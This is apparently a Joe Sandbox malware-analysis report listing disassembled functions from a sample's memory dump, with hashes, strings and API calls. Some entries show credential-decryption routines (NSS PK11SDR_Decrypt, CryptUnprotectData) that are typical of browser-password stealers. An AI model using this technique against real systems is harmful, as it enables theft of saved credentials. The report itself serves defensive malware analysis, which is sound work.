Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: a737718c4fbc39015dd96175b2ace078eab3196bee6a5a907c5522db2797f838
Instruction ID: d372eb38a77f0a0dc5dfdb5e8f251fbca70655cf6f49e2d0b0aa98c51ec2a3ca
Opcode Fuzzy Hash: a737718c4fbc39015dd96175b2ace078eab3196bee6a5a907c5522db2797f838
Instruction Fuzzy Hash: 03F190718241299ADF15FB64DC95EEE73B8BF15300F9045E9A41A620A1EF306F4ACFA1

Function 00B8C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B8C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B8C87C
PK11_GetInternalKeySlot.NSS3 ref: 00B8C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 00B8C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00B8C8EB
lstrcat.KERNEL32(?,00BA0B46), ref: 00B8C943
lstrcat.KERNEL32(?,00BA0B47), ref: 00B8C957
PK11_FreeSlot.NSS3(?), ref: 00B8C961
lstrcat.KERNEL32(?,00BA0B4E), ref: 00B8C978

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 6e56156e1a6b385223703d6c3f867380c23f5c63252ca8b2eb35693b259d99d6
Instruction ID: 6ba54c3bbac5ab7ee5e5780940548395e04d489017d324329edf0595004d3663
Opcode Fuzzy Hash: 6e56156e1a6b385223703d6c3f867380c23f5c63252ca8b2eb35693b259d99d6
Instruction Fuzzy Hash: 9F4150B591421EDBDB10DFA4DD89FEEB7B8BB44708F1041E8E509A6280D7705A84CFA1

Function 00F49D7A Relevance: 11.6, Strings: 8, Instructions: 1582COMMON

Download Yara Rule

Strings

D0Z, xrefs: 00F4A93E
UV7/, xrefs: 00F4AE1A
'w, xrefs: 00F4AE03
w?Z, xrefs: 00F4A802
"85, xrefs: 00F4AE85
k~>, xrefs: 00F4AB69
\om, xrefs: 00F4A8A0
`ui7, xrefs: 00F4A81D

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: "85$D0Z$UV7/$\om$`ui7$w?Z$'w$k~>
API String ID: 0-4272130709
Opcode ID: f3bf43411f4bd0860062f356c6e1b6b2ad4eb32d7fb2f66ac13e976e6734d7ea
Instruction ID: 486dd1593c76cd9bd5b5423a26899e5fdb009328ff74d4b8dd91c23d4cc74dd5
Opcode Fuzzy Hash: f3bf43411f4bd0860062f356c6e1b6b2ad4eb32d7fb2f66ac13e976e6734d7ea
Instruction Fuzzy Hash: 6DB207F36082009FE704AE2DEC8567ABBE9EFD4320F1A893DE6C4C7744E67558058696

Function 00F44D53 Relevance: 10.4, Strings: 7, Instructions: 1603COMMON

Download Yara Rule

Strings

j%o}, xrefs: 00F4512B
3}[9, xrefs: 00F45C47
BH{, xrefs: 00F4560E
BH{, xrefs: 00F456AB
`c, xrefs: 00F451FD
*H?o, xrefs: 00F45BA5
fH<, xrefs: 00F44E4B

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: *H?o$3}[9$BH{$BH{$`c$fH<$j%o}
API String ID: 0-3715712528
Opcode ID: 8ab04ae0c77b0979aa1ac4f87cd1d9f46fd9f353e909b1fd9ebae78b317d16a7
Instruction ID: 5f7b25fc9309d7bfea2fdedb2d16748dc8e1fe06ee46f66c6689a7e563307b7f
Opcode Fuzzy Hash: 8ab04ae0c77b0979aa1ac4f87cd1d9f46fd9f353e909b1fd9ebae78b317d16a7
Instruction Fuzzy Hash: A9B2F8F360C200AFE304AE2DEC8567ABBE9EF94720F16492DE5C4C7744EA7598418797

Function 00F48CB3 Relevance: 8.3, Strings: 6, Instructions: 776COMMON

Download Yara Rule

Strings

x|~, xrefs: 00F492F3
x|~, xrefs: 00F492FC
WV\, xrefs: 00F49015
6[Xu, xrefs: 00F48D67
_6r, xrefs: 00F48D07
w, xrefs: 00F48F6A

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 6[Xu$WV\$_6r$x|~$x|~$w
API String ID: 0-2833191427
Opcode ID: 8b16e3ba7409dcc16b9b55bad67eaa131554e76d0b310394b24731093d49e6c3
Instruction ID: d33406dbe8d0445667d6ed543e05dbff7f8de3bbb9deaba0a643a4891db9ddef
Opcode Fuzzy Hash: 8b16e3ba7409dcc16b9b55bad67eaa131554e76d0b310394b24731093d49e6c3
Instruction Fuzzy Hash: 3232F6F3A0C2009FE308AE2DEC8567AB7E9EF94320F1A493DE6C5C7744E63558458697

Function 00F4EB0C Relevance: 7.9, Strings: 5, Instructions: 1607COMMON

Download Yara Rule

Strings

FL_~, xrefs: 00F4F19A
AM;, xrefs: 00F4ED5C
>/7{, xrefs: 00F4F503
eV}, xrefs: 00F4F277
>^w, xrefs: 00F4F42D

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: >/7{$>^w$AM;$FL_~$eV}
API String ID: 0-1628495917
Opcode ID: 318f9d308b2f6e4f502a6e3fa6388831f0258ab1f617739186dcfc082316f327
Instruction ID: 19a42ccc4ad5fbf55aeb24b2d84a47c816d83fe52c8aef1f68a7ae632f3e3dfa
Opcode Fuzzy Hash: 318f9d308b2f6e4f502a6e3fa6388831f0258ab1f617739186dcfc082316f327
Instruction Fuzzy Hash: 27B207F3A0C2049FE3086E29EC8567AFBE5EF94720F16493DEAC5C7744EA3558018697

Function 00F4328A Relevance: 7.8, Strings: 5, Instructions: 1593COMMON

Download Yara Rule

Strings

8/z, xrefs: 00F440F3
FP57, xrefs: 00F445D1
,d?, xrefs: 00F435D7
VAm, xrefs: 00F4418A
b<q, xrefs: 00F43DF1

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: VAm$FP57$b<q$,d?$8/z
API String ID: 0-27551069
Opcode ID: 799d6c1836840d9c0b90f80beb49e449b9a729891de448fc478f04a0bf4afc4a
Instruction ID: ac6dfdab28141d2b8572477f57b9a01666a2d8b945e5649021bbd8039f3b9f7f
Opcode Fuzzy Hash: 799d6c1836840d9c0b90f80beb49e449b9a729891de448fc478f04a0bf4afc4a
Instruction Fuzzy Hash: 21B206F3A0C2049FE3086F2DEC9567ABBE5EB94320F1A493DEAC5C7744E67558048687

Function 00F4D14D Relevance: 7.8, Strings: 5, Instructions: 1519COMMON

Download Yara Rule

Strings

gXz}, xrefs: 00F4D3B5
6u_, xrefs: 00F4E253
adM, xrefs: 00F4DBA9
u$|_, xrefs: 00F4DE3C
a2j;, xrefs: 00F4E2FA

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 6u_$a2j;$adM$gXz}$u$|_
API String ID: 0-3571073689
Opcode ID: 0c93246c5cbdff466329d088abbd2866fa3ef7fce1c22748914848e43036bfa9
Instruction ID: 908f08c7f4ffc819f89ec82b26daf1eb40c3824ad9b9128df972bed51d1824df
Opcode Fuzzy Hash: 0c93246c5cbdff466329d088abbd2866fa3ef7fce1c22748914848e43036bfa9
Instruction Fuzzy Hash: E7A2C4F36082009FE7046E2DEC8577ABBE9EF94720F1A493DEAC4C3744E63598158697

Function 00B87240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B8724D
RtlAllocateHeap.NTDLL(00000000), ref: 00B87254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B87281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B872A4
LocalFree.KERNEL32(?), ref: 00B872AE

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
